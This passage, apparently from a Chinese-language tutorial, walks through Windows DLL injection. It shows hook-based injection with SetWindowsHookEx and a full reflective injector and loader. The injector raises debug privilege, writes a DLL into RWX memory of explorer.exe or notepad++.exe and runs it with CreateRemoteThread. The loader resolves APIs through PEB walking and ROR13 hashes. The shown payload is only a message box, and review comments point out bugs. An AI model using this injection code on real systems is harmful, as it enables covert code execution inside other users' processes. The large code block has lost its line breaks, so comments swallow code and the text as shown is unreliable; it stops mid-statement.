// look up its export, and install it as a WH_KEYBOARD hook on the target thread;
// the system then maps the DLL into the thread's process when a keyboard
// message is delivered.  DllFullPath is a global declared elsewhere.
// Defender observable: SetWindowsHookEx with a thread id belonging to another
// process (hook installs are visible through the Win32k hook tables / ETW).
// NOTE(review): LoadLibraryA and GetProcAddress results are not checked before
// use; a WH_KEYBOARD hook procedure has the HOOKPROC signature
// (LRESULT CALLBACK (int, WPARAM, LPARAM)) and is expected to call
// CallNextHookEx, whereas Sub_1 is VOID with no parameters; and nothing shown
// here ever calls UnhookWindowsHookEx on HookHandle.
BOOL Inject(IN UINT32 ThreadId, OUT HHOOK& HookHandle)
{
    HMODULE DllModule = LoadLibraryA(DllFullPath);
    FARPROC FunctionAddress = GetProcAddress(DllModule, "Sub_1");
    HookHandle = SetWindowsHookEx(WH_KEYBOARD, (HOOKPROC)FunctionAddress, DllModule, ThreadId);
    if (HookHandle == NULL)
    {
        return FALSE;
    }
    return TRUE;
}
// DLL side: the exported hook procedure
extern "C"
__declspec(dllexport)
VOID Sub_1() // exported function
{
    MessageBox(0, 0, 0, 0);
}
0x08.遠程手動實現LoadLibrary
該方法學習自github上名叫ReflectiveDllInjection的項目,大體上分為兩個部分,exe和dll,下面分別簡述。
exe:作為注入啟動程序,在目標進程申請一塊兒PAGE_EXECUTE_READWRITE內存,將Dll以文件格式直接寫入目標進程內存空間中,然后獲得導出函數"LoadDllByOEP"在文件中的偏移,使用CreateRemoteThread直接讓目標進程去執行LoadDllByOEP函數。
Dll:最關鍵導出 LoadDllByOEP 函數,在該函數里,首先通過目標進程加載模塊ntdll.dll的導出表中獲得NtFlushInstructionCache函數地址,在Kernel32.dll的導出表中獲得LoadLibraryA、GetProcAddress、VirtualAlloc函數地址;然后在進程內存空間里重新申請內存,拷貝自己的PE結構到內存里,接著修正IAT和重定向塊,最后調用模塊OEP,完成了手動實現LoadLibrary!
ps:寫代碼時參考《Windows PE權威指南》,對整個PE結構又有了新的認識。我有for循環強迫癥。。這份代碼就全貼上了。
// InjectDllByOEP.cpp : 定義控制臺應用程序的入口點。//#include "stdafx.h"#include <Windows.h>#include <iostream>#include <TlHelp32.h>using namespace std;BOOL GrantPriviledge(WCHAR* PriviledgeName);UINT32 GetLoadDllByOEPOffsetInFile(PVOID DllBuffer);UINT32 RVAToOffset(UINT32 RVA, PIMAGE_NT_HEADERS NtHeader);BOOL GetProcessIdByProcessImageName(IN WCHAR* wzProcessImageName, OUT UINT32* TargetProcessId);HANDLE WINAPI LoadRemoteDll(HANDLE ProcessHandle, PVOID ModuleFileBaseAddress, UINT32 ModuleFileSize, LPVOID lParam);CHAR DllFullPath[MAX_PATH] = { 0 };int main(){// 首先提權一波if (GrantPriviledge(SE_DEBUG_NAME) == FALSE){printf("GrantPriviledge Error/r/n");}// 接著通過進程名得到進程idUINT32 ProcessId = 0;GetCurrentDirectoryA(MAX_PATH, DllFullPath);#ifdef _WIN64// GetProcessIdByProcessImageName(L"Taskmgr.exe", &ProcessId);GetProcessIdByProcessImageName(L"explorer.exe", &ProcessId);strcat_s(DllFullPath, "//x64LoadRemoteDll.dll");#elseGetProcessIdByProcessImageName(L"notepad++.exe", &ProcessId);strcat_s(DllFullPath, "//x86LoadRemoteDll.dll");#endif// 獲得dll句柄HANDLE FileHandle = CreateFileA(DllFullPath, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);if (FileHandle == INVALID_HANDLE_VALUE){printf("Open File Error/r/n");return 0;}// 獲得dll文件長度UINT32 FileSize = GetFileSize(FileHandle, NULL);if (FileSize == INVALID_FILE_SIZE || FileSize == 0){printf("Get File Size Error/r/n");CloseHandle(FileHandle);return 0;}// 申請內存,保存PVOID FileData = HeapAlloc(GetProcessHeap(), 0, FileSize);if (FileData == NULL){printf("HeapAlloc Error/r/n");CloseHandle(FileHandle);return 0;}DWORD ReturnLength = 0;BOOL bOk = ReadFile(FileHandle, FileData, FileSize, &ReturnLength, NULL);CloseHandle(FileHandle);if (bOk == FALSE){printf("ReadFile Error/r/n");HeapFree(GetProcessHeap(), 0, FileData);return 0;}HANDLE ProcessHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, ProcessId);if (ProcessHandle == NULL){printf("OpenProcess Error/r/n");HeapFree(GetProcessHeap(), 0, FileData);return 0;}// 
執行Dll中的導出函數LoadDllByOEP,讓目標進程實現LoadLibrary功能HANDLE ThreadHandle = LoadRemoteDll(ProcessHandle, FileData, FileSize, NULL);if (ThreadHandle == NULL){goto _Clear;}WaitForSingleObject(ThreadHandle, INFINITE);_Clear:if (FileData){HeapFree(GetProcessHeap(), 0, FileData);}if (ProcessHandle){CloseHandle(ProcessHandle);}return 0;}/************************************************************************* Name : LoadRemoteDll* Param: ProcessHandle 進程句柄 (IN)* Param: ModuleBaseAddress 模塊基地址* Param: ModuleLength 模塊在文件中的大小* Param: lParam 模塊句柄* Ret : HANDLE* 將Dll以文件格式寫入目標進程內存,并執行Dll的導出函數LoadDllByOEP************************************************************************/HANDLE WINAPI LoadRemoteDll(HANDLE ProcessHandle, PVOID ModuleFileBaseAddress, UINT32 ModuleFileSize, LPVOID lParam){HANDLE ThreadHandle = NULL;__try{if (ProcessHandle == NULL || ModuleFileBaseAddress == NULL || ModuleFileSize == 0){return NULL;}// 導出函數相對于 ModuelBaseAddress 的 OffsetUINT32 FunctionOffset = GetLoadDllByOEPOffsetInFile(ModuleFileBaseAddress);if (FunctionOffset == 0){return NULL;}// 在目標進程申請內存PVOID RemoteBufferData = VirtualAllocEx(ProcessHandle, NULL, ModuleFileSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);if (RemoteBufferData == NULL){return NULL;}// 把Dll文件寫入目標進程內存空間BOOL bOk = WriteProcessMemory(ProcessHandle, RemoteBufferData, ModuleFileBaseAddress, ModuleFileSize, NULL);if (bOk == FALSE){return NULL;}// 以文件格式去執行 Dll 中的 LoadDllByOEPLPTHREAD_START_ROUTINE RemoteThreadCallBack = (LPTHREAD_START_ROUTINE)((PUINT8)RemoteBufferData + FunctionOffset);ThreadHandle = CreateRemoteThread(ProcessHandle, NULL, 1024 * 1024, RemoteThreadCallBack, lParam, 0, NULL);}__except (EXCEPTION_EXECUTE_HANDLER){ThreadHandle = NULL;}return ThreadHandle;}/************************************************************************* Name : LoadRemoteDll* Param: ProcessHandle 進程句柄* Ret : HANDLE* 獲得LoadDllByOEP在Dll文件中的偏移量************************************************************************/UINT32 
GetLoadDllByOEPOffsetInFile(PVOID DllBuffer){UINT_PTR BaseAddress = (UINT_PTR)DllBuffer;PIMAGE_DOS_HEADER DosHeader = NULL;PIMAGE_NT_HEADERS NtHeader = NULL;DosHeader = (PIMAGE_DOS_HEADER)BaseAddress;NtHeader = (PIMAGE_NT_HEADERS)((PUINT8)BaseAddress + DosHeader->e_lfanew);/*#define IMAGE_NT_OPTIONAL_HDR32_MAGIC 0x10b#define IMAGE_NT_OPTIONAL_HDR64_MAGIC 0x20b#define IMAGE_ROM_OPTIONAL_HDR_MAGIC 0x107*/if (NtHeader->OptionalHeader.Magic == IMAGE_NT_OPTIONAL_HDR32_MAGIC) // pe32{}else if (NtHeader->OptionalHeader.Magic == IMAGE_NT_OPTIONAL_HDR64_MAGIC) // pe64{}else{return 0;}UINT32 ExportDirectoryRVA = NtHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;PIMAGE_EXPORT_DIRECTORY ExportDirectory = (PIMAGE_EXPORT_DIRECTORY)((PUINT8)BaseAddress + RVAToOffset(ExportDirectoryRVA, NtHeader));UINT32 AddressOfNamesRVA = ExportDirectory->AddressOfNames;PUINT32 AddressOfNames = (PUINT32)((PUINT8)BaseAddress + RVAToOffset(AddressOfNamesRVA, NtHeader));UINT32 AddressOfFunctionsRVA = ExportDirectory->AddressOfFunctions;PUINT32 AddressOfFunctions = (PUINT32)((PUINT8)BaseAddress + RVAToOffset(AddressOfFunctionsRVA, NtHeader));UINT32 AddressOfNameOrdinalsRVA = ExportDirectory->AddressOfNameOrdinals;PUINT16 AddressOfNameOrdinals = (PUINT16)((PUINT8)BaseAddress + RVAToOffset(AddressOfNameOrdinalsRVA, NtHeader));for (UINT32 i = 0; i < ExportDirectory->NumberOfFunctions; i++){CHAR* ExportFunctionName = (CHAR*)((PUINT8)BaseAddress + RVAToOffset(*AddressOfNames, NtHeader));if (strstr(ExportFunctionName, "LoadDllByOEP") != NULL){UINT16 ExportFunctionOrdinals = AddressOfNameOrdinals[i];return RVAToOffset(AddressOfFunctions[ExportFunctionOrdinals], NtHeader);}}return 0;}/************************************************************************* Name : RVAToOffset* Param: RVA 內存中偏移* Param: NtHeader Nt頭* Ret : UINT32* 內存中偏移轉換成文件中偏移************************************************************************/UINT32 RVAToOffset(UINT32 RVA, PIMAGE_NT_HEADERS 
NtHeader){UINT32 i = 0;PIMAGE_SECTION_HEADER SectionHeader = NULL;SectionHeader = IMAGE_FIRST_SECTION(NtHeader);if (RVA < SectionHeader[0].PointerToRawData){return RVA;}for (i = 0; i < NtHeader->FileHeader.NumberOfSections; i++){if (RVA >= SectionHeader[i].VirtualAddress && RVA < (SectionHeader[i].VirtualAddress + SectionHeader[i].SizeOfRawData)){return (RVA - SectionHeader[i].VirtualAddress + SectionHeader[i].PointerToRawData);}}return 0;}/************************************************************************* Name : GetProcessIdByProcessImageName* Param: wzProcessImageName 進程映像名稱 (IN)* Param: TargetProcessId 進程Id (OUT)* Ret : BOOLEAN* 使用ToolHelp系列函數通過進程映像名稱獲得進程Id************************************************************************/BOOL GetProcessIdByProcessImageName(IN WCHAR* wzProcessImageName, OUT UINT32* TargetProcessId){HANDLE ProcessSnapshotHandle = NULL;PROCESSENTRY32 ProcessEntry32 = { 0 };ProcessEntry32.dwSize = sizeof(PROCESSENTRY32); // 初始化PROCESSENTRY32結構ProcessSnapshotHandle = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); // 給系統所有的進程快照if (ProcessSnapshotHandle == INVALID_HANDLE_VALUE){return FALSE;}Process32First(ProcessSnapshotHandle, &ProcessEntry32); // 找到第一個do{if (lstrcmpi(ProcessEntry32.szExeFile, wzProcessImageName) == 0) // 不區分大小寫{*TargetProcessId = ProcessEntry32.th32ProcessID;break;}} while (Process32Next(ProcessSnapshotHandle, &ProcessEntry32));CloseHandle(ProcessSnapshotHandle);ProcessSnapshotHandle = NULL;return TRUE;}/************************************************************************* Name : GrantPriviledge* Param: PriviledgeName 想要提升的權限* Ret : BOOLEAN* 提升自己想要的權限************************************************************************/BOOL GrantPriviledge(WCHAR* PriviledgeName){TOKEN_PRIVILEGES TokenPrivileges, OldPrivileges;DWORD dwReturnLength = sizeof(OldPrivileges);HANDLE TokenHandle = NULL;LUID uID;// 打開權限令牌if (!OpenThreadToken(GetCurrentThread(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, FALSE, &TokenHandle)){if 
(GetLastError() != ERROR_NO_TOKEN){return FALSE;}if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &TokenHandle)){return FALSE;}}if (!LookupPrivilegeValue(NULL, PriviledgeName, &uID)) // 通過權限名稱查找uID{CloseHandle(TokenHandle);return FALSE;}TokenPrivileges.PrivilegeCount = 1; // 要提升的權限個數TokenPrivileges.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; // 動態數組,數組大小根據Count的數目TokenPrivileges.Privileges[0].Luid = uID;// 在這里我們進行調整權限if (!AdjustTokenPrivileges(TokenHandle, FALSE, &TokenPrivileges, sizeof(TOKEN_PRIVILEGES), &OldPrivileges, &dwReturnLength)){CloseHandle(TokenHandle);return FALSE;}// 成功了CloseHandle(TokenHandle);return TRUE;}// LoadRemoteDll.h#include <Windows.h>#include <intrin.h>#ifdef LOADREMOTEDLL_EXPORTS#define LOADREMOTEDLL_API __declspec(dllexport)#else#define LOADREMOTEDLL_API __declspec(dllimport)#endif#define KERNEL32DLL_HASH 0x6A4ABC5B#define NTDLLDLL_HASH 0x3CFA685D#define LOADLIBRARYA_HASH 0xEC0E4E8E#define GETPROCADDRESS_HASH 0x7C0DFCAA#define VIRTUALALLOC_HASH 0x91AFCA54#define NTFLUSHINSTRUCTIONCACHE_HASH 0x534C0AB8#define IMAGE_REL_BASED_ARM_MOV32A 5#define IMAGE_REL_BASED_ARM_MOV32T 7#define HASH_KEY 13#pragma intrinsic( _rotr )__forceinline UINT32 ror(UINT32 d){return _rotr(d, HASH_KEY);}__forceinline UINT32 hash(char * c){register UINT32 h = 0;do{h = ror(h);h += *c;} while (*++c);return h;}//////////////////////////////////////////////////////////////////////////typedef struct _UNICODE_STRING{USHORT Length;USHORT MaximumLength;PWSTR Buffer;} UNICODE_STRING, *PUNICODE_STRING;typedef struct _PEB_LDR_DATA_WIN7_X64{UINT32 Length;UINT8 Initialized;UINT8 _PADDING0_[0x3];PVOID SsHandle;LIST_ENTRY InLoadOrderModuleList;LIST_ENTRY InMemoryOrderModuleList;LIST_ENTRY InInitializationOrderModuleList;PVOID EntryInProgress;UINT8 ShutdownInProgress;UINT8 _PADDING1_[0x7];PVOID ShutdownThreadId;}PEB_LDR_DATA_WIN7_X64, *PPEB_LDR_DATA_WIN7_X64;typedef struct _PEB_LDR_DATA_WINXP_X86{UINT32 Length;UINT8 Initialized;UINT8 
_PADDING0_[0x3];PVOID SsHandle;LIST_ENTRY InLoadOrderModuleList;LIST_ENTRY InMemoryOrderModuleList;LIST_ENTRY InInitializationOrderModuleList;PVOID EntryInProgress;}PEB_LDR_DATA_WINXP_X86, *PPEB_LDR_DATA_WINXP_X86;#ifdef _WIN64#define PPEB_LDR_DATA PPEB_LDR_DATA_WIN7_X64#define PEB_LDR_DATA PEB_LDR_DATA_WIN7_X64#else #define PPEB_LDR_DATA PPEB_LDR_DATA_WINXP_X86#define PEB_LDR_DATA PEB_LDR_DATA_WINXP_X86#endiftypedef struct _CURDIR{UNICODE_STRING DosPath;HANDLE Handle;} CURDIR, *PCURDIR;typedef struct _RTL_USER_PROCESS_PARAMETERS_WINXP_X86 {UINT32 MaximumLength;UINT32 Length;UINT32 Flags;UINT32 DebugFlags;HANDLE ConsoleHandle;UINT32 ConsoleFlags;HANDLE StandardInput;HANDLE StandardOutput;HANDLE StandardError;CURDIR CurrentDirectory; // ProcessParametersUNICODE_STRING DllPath; // ProcessParametersUNICODE_STRING ImagePathName; // ProcessParametersUNICODE_STRING CommandLine; // ProcessParametersPVOID Environment;UINT32 StartingX;UINT32 StartingY;UINT32 CountX;UINT32 CountY;UINT32 CountCharsX;UINT32 CountCharsY;UINT32 FillAttribute;UINT32 WindowFlags;UINT32 ShowWindowFlags;UNICODE_STRING WindowTitle;UNICODE_STRING DesktopInfo;UNICODE_STRING ShellInfo;UNICODE_STRING RuntimeData;UINT32 CurrentDirectores[8];}RTL_USER_PROCESS_PARAMETERS_WINXP_X86, *PRTL_USER_PROCESS_PARAMETERS_WINXP_X86;typedef struct _RTL_USER_PROCESS_PARAMETERS_WIN7_X64 {UINT32 MaximumLength;UINT32 Length;UINT32 Flags;UINT32 DebugFlags;HANDLE ConsoleHandle;UINT32 ConsoleFlags;HANDLE StandardInput;HANDLE StandardOutput;HANDLE StandardError;CURDIR CurrentDirectory; // ProcessParametersUNICODE_STRING DllPath; // ProcessParametersUNICODE_STRING ImagePathName; // ProcessParametersUNICODE_STRING CommandLine; // ProcessParametersPVOID Environment;UINT32 StartingX;UINT32 StartingY;UINT32 CountX;UINT32 CountY;UINT32 CountCharsX;UINT32 CountCharsY;UINT32 FillAttribute;UINT32 WindowFlags;UINT32 ShowWindowFlags;UNICODE_STRING WindowTitle;UNICODE_STRING DesktopInfo;UNICODE_STRING ShellInfo;UNICODE_STRING 
RuntimeData;UINT32 CurrentDirectores[8];UINT64 EnvironmentSize;UINT64 EnvironmentVersion;}RTL_USER_PROCESS_PARAMETERS_WIN7_X64, *PRTL_USER_PROCESS_PARAMETERS_WIN7_X64;#ifdef _WIN64#define PRTL_USER_PROCESS_PARAMETERS PRTL_USER_PROCESS_PARAMETERS_WIN7_X64#define RTL_USER_PROCESS_PARAMETERS RTL_USER_PROCESS_PARAMETERS_WIN7_X64#else #define PRTL_USER_PROCESS_PARAMETERS PRTL_USER_PROCESS_PARAMETERS_WINXP_X86#define RTL_USER_PROCESS_PARAMETERS RTL_USER_PROCESS_PARAMETERS_WINXP_X86#endif#define GDI_HANDLE_BUFFER_SIZE32 34#define GDI_HANDLE_BUFFER_SIZE64 60#ifndef _WIN64#define GDI_HANDLE_BUFFER_SIZE GDI_HANDLE_BUFFER_SIZE32#else#define GDI_HANDLE_BUFFER_SIZE GDI_HANDLE_BUFFER_SIZE64#endiftypedef UINT32 GDI_HANDLE_BUFFER[GDI_HANDLE_BUFFER_SIZE];// PEB結構typedef struct _PEB{BOOLEAN InheritedAddressSpace;BOOLEAN ReadImageFileExecOptions;BOOLEAN BeingDebugged;union{BOOLEAN BitField;struct{BOOLEAN ImageUsesLargePages : 1;BOOLEAN IsProtectedProcess : 1;BOOLEAN IsLegacyProcess : 1;BOOLEAN IsImageDynamicallyRelocated : 1;BOOLEAN SkipPatchingUser32Forwarders : 1;BOOLEAN IsPackagedProcess : 1;BOOLEAN IsAppContainer : 1;BOOLEAN SpareBits : 1;};};HANDLE Mutant;PVOID ImageBaseAddress;PPEB_LDR_DATA Ldr;PRTL_USER_PROCESS_PARAMETERS ProcessParameters;PVOID SubSystemData;PVOID ProcessHeap;PRTL_CRITICAL_SECTION FastPebLock;PVOID AtlThunkSListPtr;PVOID IFEOKey;union{UINT32 CrossProcessFlags;struct{UINT32 ProcessInJob : 1;UINT32 ProcessInitializing : 1;UINT32 ProcessUsingVEH : 1;UINT32 ProcessUsingVCH : 1;UINT32 ProcessUsingFTH : 1;UINT32 ReservedBits0 : 27;};UINT32 EnvironmentUpdateCount;};union{PVOID KernelCallbackTable;PVOID UserSharedInfoPtr;};UINT32 SystemReserved[1];UINT32 AtlThunkSListPtr32;PVOID ApiSetMap;UINT32 TlsExpansionCounter;PVOID TlsBitmap;UINT32 TlsBitmapBits[2];PVOID ReadOnlySharedMemoryBase;PVOID HotpatchInformation;PVOID* ReadOnlyStaticServerData;PVOID AnsiCodePageData;PVOID OemCodePageData;PVOID UnicodeCaseTableData;UINT32 NumberOfProcessors;UINT32 
NtGlobalFlag;LARGE_INTEGER CriticalSectionTimeout;SIZE_T HeapSegmentReserve;SIZE_T HeapSegmentCommit;SIZE_T HeapDeCommitTotalFreeThreshold;SIZE_T HeapDeCommitFreeBlockThreshold;UINT32 NumberOfHeaps;UINT32 MaximumNumberOfHeaps;PVOID* ProcessHeaps;PVOID GdiSharedHandleTable;PVOID ProcessStarterHelper;UINT32 GdiDCAttributeList;PRTL_CRITICAL_SECTION LoaderLock;UINT32 OSMajorVersion;UINT32 OSMinorVersion;UINT16 OSBuildNumber;UINT16 OSCSDVersion;UINT32 OSPlatformId;UINT32 ImageSubsystem;UINT32 ImageSubsystemMajorVersion;UINT32 ImageSubsystemMinorVersion;UINT_PTR ImageProcessAffinityMask;GDI_HANDLE_BUFFER GdiHandleBuffer;PVOID PostProcessInitRoutine;PVOID TlsExpansionBitmap;UINT32 TlsExpansionBitmapBits[32];UINT32 SessionId;ULARGE_INTEGER AppCompatFlags;ULARGE_INTEGER AppCompatFlagsUser;PVOID pShimData;PVOID AppCompatInfo;UNICODE_STRING CSDVersion;PVOID ActivationContextData;PVOID ProcessAssemblyStorageMap;PVOID SystemDefaultActivationContextData;PVOID SystemAssemblyStorageMap;SIZE_T MinimumStackCommit;PVOID* FlsCallback;LIST_ENTRY FlsListHead;PVOID FlsBitmap;UINT32 FlsBitmapBits[FLS_MAXIMUM_AVAILABLE / (sizeof(UINT32) * 8)];UINT32 FlsHighIndex;PVOID WerRegistrationData;PVOID WerShipAssertPtr;PVOID pContextData;PVOID pImageHeaderHash;union{UINT32 TracingFlags;struct{UINT32 HeapTracingEnabled : 1;UINT32 CritSecTracingEnabled : 1;UINT32 LibLoaderTracingEnabled : 1;UINT32 SpareTracingBits : 29;};};UINT64 CsrServerReadOnlySharedMemoryBase;} PEB, *PPEB;// Ldr 三根鏈表結構typedef struct _LDR_DATA_TABLE_ENTRY {LIST_ENTRY InLoadOrderLinks;LIST_ENTRY InMemoryOrderLinks;LIST_ENTRY InInitializationOrderLinks;PVOID DllBase;PVOID EntryPoint;UINT32 SizeOfImage;UNICODE_STRING FullDllName;UNICODE_STRING BaseDllName;UINT32 Flags;UINT16 LoadCount;UINT16 TlsIndex;union {LIST_ENTRY HashLinks;struct {PVOID SectionPointer;UINT32 CheckSum;};};union {struct {UINT32 TimeDateStamp;};struct {PVOID LoadedImports;};};struct _ACTIVATION_CONTEXT * EntryPointActivationContext;PVOID PatchInformation;} 
LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;typedef const struct _LDR_DATA_TABLE_ENTRY *PCLDR_DATA_TABLE_ENTRY;LOADREMOTEDLL_API UINT_PTR WINAPI LoadDllByOEP(PVOID lParam);// LoadRemoteDll.cpp// LoadRemoteDll.cpp : 定義 DLL 應用程序的導出函數。//#include "stdafx.h"#include "LoadRemoteDll.h"#pragma intrinsic(_ReturnAddress)__declspec(noinline)UINT_PTR caller(){return (UINT_PTR)_ReturnAddress(); // #include <intrin.h>}typedefHMODULE(WINAPI * pfnLoadLibraryA)(LPCSTR lpLibFileName);typedefFARPROC(WINAPI * pfnGetProcAddress)(HMODULE hModule, LPCSTR lpProcName);typedefLPVOID(WINAPI * pfnVirtualAlloc)(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect);typedefLONG // NTSTATUS(NTAPI * pfnNtFlushInstructionCache)(HANDLE ProcessHandle, PVOID BaseAddress, SIZE_T Length);typedefBOOL(APIENTRY * pfnDllMain)(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved);LOADREMOTEDLL_API UINT_PTR WINAPI LoadDllByOEP(PVOID lParam){UINT_PTR LibraryAddress = 0;PIMAGE_DOS_HEADER DosHeader = NULL;PIMAGE_NT_HEADERS NtHeader = NULL;pfnLoadLibraryA LoadLibraryAAddress = NULL;pfnGetProcAddress GetProcAddressAddress = NULL;pfnVirtualAlloc VirtualAllocAddress = NULL;pfnNtFlushInstructionCache NtFlushInstructionCacheAddress = NULL;LibraryAddress = caller(); // 獲得下一步指令的地址,其實就是為了獲得當前指令地址,為后面尋找PE頭提供起點DosHeader = (PIMAGE_DOS_HEADER)LibraryAddress;while (TRUE){if (DosHeader->e_magic == IMAGE_DOS_SIGNATURE &&DosHeader->e_lfanew >= sizeof(IMAGE_DOS_HEADER) &&DosHeader->e_lfanew < 1024){NtHeader = (PIMAGE_NT_HEADERS)((PUINT8)LibraryAddress + DosHeader->e_lfanew);if (NtHeader->Signature == IMAGE_NT_SIGNATURE){break;}}LibraryAddress--;DosHeader = (PIMAGE_DOS_HEADER)LibraryAddress;}// 獲得PEB#ifdef _WIN64PPEB Peb = (PPEB)__readgsqword(0x60);#elsePPEB Peb = (PPEB)__readfsdword(0x30);#endifPPEB_LDR_DATA Ldr = Peb->Ldr;// 1.從Dll導出表中獲取函數地址for (PLIST_ENTRY TravelListEntry = (PLIST_ENTRY)Ldr->InLoadOrderModuleList.Flink;TravelListEntry != &Ldr->InLoadOrderModuleList; // 空頭節點TravelListEntry = 
TravelListEntry->Flink){PLDR_DATA_TABLE_ENTRY LdrDataTableEntry = (PLDR_DATA_TABLE_ENTRY)TravelListEntry;UINT32 FunctionCount = 0;// WCHAR* DllName = (WCHAR*)LdrDataTableEntry->BaseDllName.Buffer;UINT_PTR DllName = (UINT_PTR)LdrDataTableEntry->BaseDllName.Buffer;UINT32 DllLength = LdrDataTableEntry->BaseDllName.Length;UINT_PTR DllBaseAddress = (UINT_PTR)LdrDataTableEntry->DllBase;DosHeader = (PIMAGE_DOS_HEADER)DllBaseAddress;NtHeader = (PIMAGE_NT_HEADERS)((PUINT8)DllBaseAddress + DosHeader->e_lfanew);IMAGE_DATA_DIRECTORY ExportDataDirectory = (IMAGE_DATA_DIRECTORY)(NtHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT]);PIMAGE_EXPORT_DIRECTORY ExportDirectory = (PIMAGE_EXPORT_DIRECTORY)((PUINT8)DllBaseAddress + ExportDataDirectory.VirtualAddress);PUINT32 AddressOfFunctions = (PUINT32)((PUINT8)DllBaseAddress + ExportDirectory->AddressOfFunctions);PUINT32 AddressOfNames = (PUINT32)((PUINT8)DllBaseAddress + ExportDirectory->AddressOfNames);PUINT16 AddressOfNameOrdinals = (PUINT16)((PUINT8)DllBaseAddress + ExportDirectory->AddressOfNameOrdinals);UINT16 Ordinal = 0;UINT_PTR ExportFunctionAddress = 0;UINT32 HashValue = 0;// 將Dll名稱轉換成Hash值do{HashValue = ror((UINT32)HashValue);if (*((PUINT8)DllName) >= 'a'){HashValue += *((PUINT8)DllName) - 0x20;}else{HashValue += *((PUINT8)DllName);}DllName++;} while (--DllLength);if (HashValue == KERNEL32DLL_HASH){FunctionCount = 3;for (INT i = 0; i < ExportDirectory->NumberOfFunctions; i++){if (FunctionCount == 0){break;}CHAR* szExportFunctionName = (CHAR*)((PUINT8)DllBaseAddress + AddressOfNames[i]);HashValue = hash(szExportFunctionName);if (HashValue == LOADLIBRARYA_HASH){Ordinal = AddressOfNameOrdinals[i];LoadLibraryAAddress = (pfnLoadLibraryA)((PUINT8)DllBaseAddress + AddressOfFunctions[Ordinal]);FunctionCount--;}else if (HashValue == GETPROCADDRESS_HASH){Ordinal = AddressOfNameOrdinals[i];GetProcAddressAddress = (pfnGetProcAddress)((PUINT8)DllBaseAddress + AddressOfFunctions[Ordinal]);FunctionCount--;}else if 
(HashValue == VIRTUALALLOC_HASH){Ordinal = AddressOfNameOrdinals[i];VirtualAllocAddress = (pfnVirtualAlloc)((PUINT8)DllBaseAddress + AddressOfFunctions[Ordinal]);FunctionCount--;}}}else if (HashValue == NTDLLDLL_HASH){FunctionCount = 1;for (INT i = 0; i < ExportDirectory->NumberOfFunctions; i++){if (FunctionCount == 0){break;}CHAR* szExportFunctionName = (CHAR*)((PUINT8)DllBaseAddress + AddressOfNames[i]);HashValue = hash(szExportFunctionName);if (HashValue == NTFLUSHINSTRUCTIONCACHE_HASH){Ordinal = AddressOfNameOrdinals[i];NtFlushInstructionCacheAddress = (pfnNtFlushInstructionCache)((PUINT8)DllBaseAddress + AddressOfFunctions[Ordinal]);FunctionCount--;}}}if (LoadLibraryAAddress != NULL &&GetProcAddressAddress != NULL &&VirtualAllocAddress != NULL &&NtFlushInstructionCacheAddress != NULL){break;}}// 2.申請內存,重新加載我們的Dll// 再次更新DosHeader和NtHeaderDosHeader = (PIMAGE_DOS_HEADER)LibraryAddress;NtHeader = (PIMAGE_NT_HEADERS)((PUINT8)LibraryAddress + DosHeader->e_lfanew);// 重新申請內存(SizeOfImage就是PE在內存中的大?。?* _asm{int 3;}*/// 這個自己重新申請的頭指針不敢隨便移動,使用一個變量來替代UINT_PTR NewBaseAddress = (UINT_PTR)VirtualAllocAddress(NULL, NtHeader->OptionalHeader.SizeOfImage, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);UINT_PTR OldPtr = LibraryAddress;UINT_PTR BasePtr = NewBaseAddress;// 2.1首先拷貝頭 + 節表UINT32 SizeOfHeaders = NtHeader->OptionalHeader.SizeOfHeaders;while (SizeOfHeaders--){*(PUINT8)BasePtr++ = *(PUINT8)OldPtr++;}// memcpy((PVOID)NewBaseAddress, (PVOID)LibraryAddress, NtHeader->OptionalHeader.SizeOfHeaders);/*PIMAGE_SECTION_HEADER SectionHeader = (PIMAGE_SECTION_HEADER)((PUINT8)&NtHeader->OptionalHeader + NtHeader->FileHeader.SizeOfOptionalHeader);UINT32 NumberOfSections = NtHeader->FileHeader.NumberOfSections;while (NumberOfSections--){UINT_PTR NewSectionAddress = (UINT_PTR)((PUINT8)NewBaseAddress + SectionHeader->VirtualAddress);UINT_PTR OldSectionAddress = (UINT_PTR)((PUINT8)LibraryAddress + SectionHeader->PointerToRawData);UINT32 SizeOfRawData = SectionHeader->SizeOfRawData;while 
(SizeOfRawData--){*(PUINT8)NewSectionAddress++ = *(PUINT8)OldSectionAddress++;}SectionHeader = (PIMAGE_SECTION_HEADER)((PUINT8)SectionHeader + sizeof(IMAGE_SECTION_HEADER));}*/// 2.2拷貝節區PIMAGE_SECTION_HEADER SectionHeader = IMAGE_FIRST_SECTION(NtHeader);for (INT i = 0; i < NtHeader->FileHeader.NumberOfSections; i++){if (SectionHeader[i].VirtualAddress == 0 || SectionHeader[i].SizeOfRawData == 0) // 節塊里面沒有數據{continue;}// 定位該節塊在內存中的位置UINT_PTR NewSectionAddress = (UINT_PTR)((PUINT8)NewBaseAddress + SectionHeader[i].VirtualAddress);UINT_PTR OldSectionAddress = (UINT_PTR)((PUINT8)LibraryAddress + SectionHeader[i].PointerToRawData);// 復制節塊數據到虛擬內存UINT32 SizeOfRawData = SectionHeader[i].SizeOfRawData;while (SizeOfRawData--){*(PUINT8)NewSectionAddress++ = *(PUINT8)OldSectionAddress++;}//memcpy(SectionAddress, (PVOID)((PUINT8)LibraryAddress + SectionHeader[i].PointerToRawData), SectionHeader[i].SizeOfRawData);}// 2.3修正導入表(IAT)IMAGE_DATA_DIRECTORY ImportDataDirectory = (IMAGE_DATA_DIRECTORY)(NtHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT]);PIMAGE_IMPORT_DESCRIPTOR ImportDescriptor = 